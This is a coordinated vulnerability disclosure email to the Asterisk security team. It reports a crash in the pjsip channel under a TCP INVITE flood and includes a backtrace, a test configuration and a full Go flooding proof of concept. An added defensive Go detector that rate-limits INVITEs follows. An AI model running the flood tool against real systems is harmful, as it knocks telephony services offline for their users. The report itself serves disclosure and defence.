On Mon, 31 Aug 2020 10:54:49 -0300 Asterisk Development Team wrote:

> What public PGP key was used for this message? The current Asterisk
> Development Team one is
> http://keys.gnupg.net/pks/lookup?op=get&search=0x5D984BE337191CE7
>

A really old one for security@asterisk.org. Let's try again:

Dear Asterisk security team,

We identified a denial of service issue that appears to affect the pjsip channel during an INVITE flood attack over TCP. Please find the attached report with the full details. Do note that this is subject to our vulnerability disclosure policy, which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy. Our latest planned disclosure date according to our policy is 30th November 2020.

Please find my public key at https://keybase.io/sandrogauci/pgp_keys.asc. Alfred's is at https://keybase.io/alfredfarrugia/pgp_keys.asc.

We have included some code written in Go to easily reproduce this issue. Let me know if you need any further details to reproduce the issue.
Best regards,

--
Sandro Gauci, CEO at Enable Security GmbH
Register of Companies: AG Charlottenburg HRB 173016 B
Company HQ: Pappelallee 78/79, 10437 Berlin
PGP/Encrypted comms: https://keybase.io/sandrogauci
Other points of contact: https://enablesecurity.com/#contact-us

Attachment: README.md

# Asterisk crashes due to INVITE flood over TCP

- Fixed version: XXX
- Enable Security Advisory: XXX
- Asterisk Security Advisory: XXX
- Tested vulnerable versions: 17.5.1, 17.6.0
- Timeline:
  - Report date: XXX

## Description

When an Asterisk instance is flooded with INVITE messages over TCP, after some time Asterisk crashes with a segmentation fault. The crash happens while Asterisk sends a response to a newly received INVITE (`new_invite` calling `ast_sip_session_send_response`), at the `PJ_ASSERT_RETURN` in `pjsip_inv_send_msg` (`sip_inv.c:3276`) that checks the outgoing message for a CSeq header. The backtrace generated after the crash is:

```
3276 PJ_ASSERT_RETURN((cseq=(pjsip_cseq_hdr*)pjsip_msg_find_hdr(tdata->msg, PJSIP_H_CSEQ, NULL))!=NULL
(gdb) bt
#0  0x00007ffff7df1b80 in pjsip_inv_send_msg (inv=0x7fffc88aa5a8, tdata=0x7fffa706a6d8) at ../src/pjsip-ua/sip_inv.c:3276
#1  0x00007ffff4623c41 in ast_sip_session_send_response (session=0x7fffc88ab9f0, tdata=0x7fffa706a6d8) at res_pjsip_session.c:1917
#2  0x00007ffff4627b6b in new_invite (invite=0x7fff94eccb60) at res_pjsip_session.c:3253
#3  0x00007ffff462815b in handle_new_invite_request (rdata=0x7fffa61ec608) at res_pjsip_session.c:3382
#4  0x00007ffff462833d in session_on_rx_request (rdata=0x7fffa61ec608) at res_pjsip_session.c:3446
#5  0x00007ffff7e190ec in pjsip_endpt_process_rx_data (endpt=0x5555559c9d18, rdata=0x7fffa61ec608, p=0x7ffff47c66a0, p_handled=0x7fff94eccc6c) at ../src/pjsip/sip_endpoint.c:930
#6  0x00007ffff47922a1 in distribute (data=0x7fffa61ec608) at res_pjsip/pjsip_distributor.c:955
#7  0x000055555574c7e1 in ast_taskprocessor_execute (tps=0x555555bb5a80) at taskprocessor.c:1237
#8  0x0000555555756dc7 in execute_tasks (data=0x555555bb5a80) at threadpool.c:1354
#9  0x000055555574c7e1 in ast_taskprocessor_execute (tps=0x5555559c8040) at taskprocessor.c:1237
#10 0x0000555555754698 in threadpool_execute (pool=0x5555559c6070) at threadpool.c:367
#11 0x000055555575655d in worker_active (worker=0x7fff98003e50) at threadpool.c:1137
#12 0x00005555557562bb in worker_start (arg=0x7fff98003e50) at threadpool.c:1056
#13 0x00005555557604ad in dummy_start (data=0x7fffa41fb6e0) at utils.c:1249
#14 0x00007ffff764e609 in start_thread (arg=) at pthread_create.c:477
#15 0x00007ffff728b103 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
```

## Impact

Abuse of this vulnerability leads to denial of service (a crash of the Asterisk process) when SIP over TCP is in use.
## How to reproduce the issue

The following `pjsip.conf` configuration file was used to facilitate the reproduction of this issue. It enables a TCP transport on all interfaces and accepts calls from an anonymous endpoint:

```
[global]
debug=yes

[transport-tcp]
type = transport
protocol = tcp
bind = 0.0.0.0

[anonymous]
type = endpoint
context = anon
allow = all
```

The following code in Go can be used to reproduce this issue. It starts 100 concurrent workers; each worker opens a TCP connection to the target and sends INVITEs back to back, reconnecting whenever a write fails:

```go
package main

import (
	"bytes"
	"flag"
	"fmt"
	"math/rand"
	"net"
	"strconv"
	"strings"
	"time"
)

const charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

func init() {
	rand.Seed(time.Now().UnixNano())
}

// randstr returns a random alphanumeric string, used for the Via branch parameter
// so that every INVITE looks like a new transaction.
func randstr(length int) string {
	b := make([]byte, length)
	for i := range b {
		b[i] = charset[rand.Intn(len(charset))]
	}
	return string(b)
}

// loop is one flooding worker: a TCP connection to the target plus an INVITE
// template with _BRANCH_ and _CSEQ_ placeholders.
type loop struct {
	host   string
	port   int
	conn   net.Conn
	invite []byte
	cseq   int
}

// start builds the INVITE template, connects to the target and hands over to
// run; if the connection attempt fails it waits briefly and retries.
func (l *loop) start() {
	sdp := "v=0\r\n"
	sdp += "o=- 1598350717 1598350717 IN IP4 192.168.1.112\r\n"
	sdp += "s=-\r\n"
	sdp += "c=IN IP4 192.168.1.112\r\n"
	sdp += "t=0 0\r\n"
	sdp += "m=audio 9999 RTP/AVP 0\r\n"
	sdp += "a=rtpmap:0 PCMU/8000/1\r\n"
	sdp += "a=sendrecv\r\n"

	invite := "INVITE sip:5cb49ced@127.0.0.1:5060 SIP/2.0\r\n"
	invite += "Via: SIP/2.0/UDP 192.168.1.112:44896;rport;branch=z9hG4bK-_BRANCH_\r\n"
	invite += "Max-Forwards: 70\r\n"
	invite += "From: ;tag=2k309f\r\n"
	invite += "To: \r\n"
	invite += "Call-ID: 2345908ux\r\n"
	invite += "CSeq: _CSEQ_ INVITE\r\n"
	invite += "Contact: \r\n"
	invite += fmt.Sprintf("Content-Length: %d\r\n", len(sdp))
	invite += "Content-Type: application/sdp\r\n"
	invite += "\r\n"
	invite += sdp
	l.invite = []byte(invite)

	var err error
	l.conn, err = net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", l.host, l.port), 5*time.Second)
	if err != nil {
		fmt.Println(err.Error())
		time.Sleep(10 * time.Millisecond)
		go l.start()
		return
	}
	l.run()
}

// run writes INVITEs as fast as the socket accepts them, each with a fresh
// branch and an incremented CSeq. The write deadline is absolute, so about
// 10 ms after connecting the writes start failing; the worker then closes the
// connection and reconnects, so the target sees a churn of short-lived TCP
// connections each carrying a burst of INVITEs.
func (l *loop) run() {
	if err := l.conn.SetWriteDeadline(time.Now().Add(10 * time.Millisecond)); err != nil {
		if strings.Contains(err.Error(), "use of closed network connection") {
			l.start()
			return
		}
	}
	for {
		l.cseq++
		inv := bytes.ReplaceAll(l.invite, []byte("_BRANCH_"), []byte(randstr(8)))
		inv = bytes.ReplaceAll(inv, []byte("_CSEQ_"), []byte(strconv.Itoa(l.cseq)))
		if _, err := l.conn.Write(inv); err != nil {
			l.conn.Close()
			go l.start()
			return
		}
	}
}

func main() {
	var port = flag.Int("p", 5060, "Port")
	var host = flag.String("h", "127.0.0.1", "Host")
	flag.Parse()
	// 100 workers flood the target concurrently.
	for i := 0; i < 100; i++ {
		go func() {
			l := loop{
				host: *host,
				port: *port,
			}
			l.start()
		}()
	}
	select {}
}
```

## Solution and recommendations

XXX

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy, which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy.
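## Added example: detecting an INVITE flood on a TCP stream

The reproduction above floods a TCP transport with INVITEs from many short-lived connections. The Go program below is an added example, not part of the report, of Enable Security's tooling or of Asterisk: it is the defensive counterpart, a detector that frames SIP requests off a raw TCP byte stream by Content-Length (the way a passive tap or a SIP-aware proxy in front of Asterisk would) and flags a source that exceeds an INVITE budget inside a sliding window. The one-second window, the limit of 100 INVITEs, the 64 KiB Content-Length cap, the simulated arrival times and the sample traffic are all assumptions constructed for the example; the advisory gives no such numbers.

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"strconv"
	"strings"
	"time"
)

// readRequest frames one SIP request on a TCP stream (RFC 3261 section 18.3): request line,
// headers up to the empty line, then exactly Content-Length body bytes, which are consumed so
// the next request starts on the right byte. It returns the request method.
func readRequest(r *bufio.Reader) (string, error) {
	method, bodyLen := "", int64(0)
	for i := 0; ; i++ {
		line, err := r.ReadString('\n')
		if err != nil {
			if i > 0 || line != "" { // EOF mid-message is a truncation, not a clean end
				return "", fmt.Errorf("truncated request: %w", err)
			}
			return "", err
		}
		line = strings.TrimRight(line, "\r\n")
		if i == 0 {
			parts := strings.Fields(line)
			if len(parts) != 3 || parts[2] != "SIP/2.0" {
				return "", fmt.Errorf("not a SIP request line: %q", line)
			}
			method = parts[0]
		} else if line == "" {
			break // end of headers
		} else if name, value, _ := strings.Cut(line, ":"); strings.EqualFold(strings.TrimSpace(name), "Content-Length") || strings.TrimSpace(name) == "l" {
			// Names are case-insensitive and "l" is the compact form; a folded continuation line
			// has no ":" and falls through. The 64 KiB cap is an assumed limit on skipped bodies.
			bodyLen, err = strconv.ParseInt(strings.TrimSpace(value), 10, 64)
			if err != nil || bodyLen < 0 || bodyLen > 64<<10 {
				return "", fmt.Errorf("bad Content-Length %q", value)
			}
		}
	}
	if _, err := io.CopyN(io.Discard, r, bodyLen); err != nil {
		return "", fmt.Errorf("truncated body: %w", err)
	}
	return method, nil
}

// inviteCounter keeps a sliding window of INVITE arrival times per source; record notes one
// INVITE from src at now and reports whether src has sent more than limit INVITEs in window.
type inviteCounter struct {
	window time.Duration
	limit  int
	seen   map[string][]time.Time
}

func (c *inviteCounter) record(src string, now time.Time) bool {
	if c.seen == nil {
		c.seen = map[string][]time.Time{}
	}
	ts := c.seen[src]
	for len(ts) > 0 && !ts[0].After(now.Add(-c.window)) {
		ts = ts[1:] // expire arrivals that fell out of the window
	}
	c.seen[src] = append(ts, now)
	return len(c.seen[src]) > c.limit
}

// scanStream frames every request on one TCP connection from src, feeds the INVITEs to c and
// returns the INVITE count, whether src crossed the limit and any framing error. Arrival times
// are simulated as base+i*gap so the example runs offline; a live tap would use receive time.
func scanStream(src string, stream []byte, c *inviteCounter, base time.Time, gap time.Duration) (int, bool, error) {
	r := bufio.NewReader(bytes.NewReader(stream))
	invites, flagged := 0, false
	for i := 0; ; i++ {
		method, err := readRequest(r)
		if err == io.EOF {
			return invites, flagged, nil // clean end of stream
		} else if err != nil {
			return invites, flagged, err
		}
		if method == "INVITE" {
			flagged = c.record(src, base.Add(time.Duration(i)*gap)) || flagged
			invites++
		}
	}
}

// buildStream returns n back-to-back INVITEs shaped like the report's PoC (SDP body) followed by
// one bodiless OPTIONS, as one TCP peer would send them. Constructed sample traffic; the
// addresses are RFC 5737 documentation ranges.
func buildStream(n int) []byte {
	sdp := "v=0\r\no=- 1 1 IN IP4 192.0.2.10\r\ns=-\r\nc=IN IP4 192.0.2.10\r\nt=0 0\r\nm=audio 9999 RTP/AVP 0\r\na=rtpmap:0 PCMU/8000\r\n"
	inv := "INVITE sip:100@192.0.2.1 SIP/2.0\r\nVia: SIP/2.0/TCP 192.0.2.10:5060;branch=z9hG4bKabc\r\n" +
		"From: <sip:a@192.0.2.10>;tag=x\r\nTo: <sip:100@192.0.2.1>\r\nCall-ID: c1\r\nCSeq: 1 INVITE\r\n" +
		"Content-Type: application/sdp\r\nContent-Length: " + strconv.Itoa(len(sdp)) + "\r\n\r\n" + sdp
	opt := "OPTIONS sip:192.0.2.1 SIP/2.0\r\nCSeq: 1 OPTIONS\r\nl: 0\r\n\r\n"
	return []byte(strings.Repeat(inv, n) + opt)
}
```

Calling `scanStream("192.0.2.10", buildStream(300), &inviteCounter{window: time.Second, limit: 100}, base, 5*time.Millisecond)` flags the source (200 INVITEs per second), while a gap of 10 ms (exactly 100 per second) never exceeds the limit, and a second source sharing the same counter is judged on its own. Because the framer reads bodies by Content-Length it stays aligned across the back-to-back INVITEs with SDP bodies, and a connection that stops mid-header comes back as an error rather than a clean end of stream, so a dangling partial message cannot silence the detector.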